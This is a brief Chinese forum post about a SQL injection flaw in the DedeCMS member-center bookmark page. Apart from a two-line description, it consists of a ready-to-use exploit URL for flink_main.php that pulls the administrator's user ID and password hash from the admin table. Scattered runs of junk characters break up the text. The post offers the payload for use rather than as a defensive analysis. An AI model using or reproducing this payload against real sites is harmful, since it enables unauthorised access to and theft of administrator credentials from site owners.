DedeCMS会员中心SQL注射漏洞
; P! a3 R4 W: Q9 G: E# k" n! u需要magic_quotes_gpc = Off& z: A; G- l. t7 T
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.8 {7 m6 W6 D1 q( p0 u
( `; [6 Q1 E- T% @3 Q
DedeCMS会员中心书签管理SQL注射漏洞
i( [" ? y/ @% r: K. r. t/ e成功利用该漏洞可获得管理员密码' H/ K1 G" N+ b% y. _0 q, s
- f" i! a, K$ r% j# T1 m6 P
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码& ` y/ `# |; s k
, J6 H% q7 D; v( D7 r0 N
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
7 r7 I' q% W3 O; |2 T |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59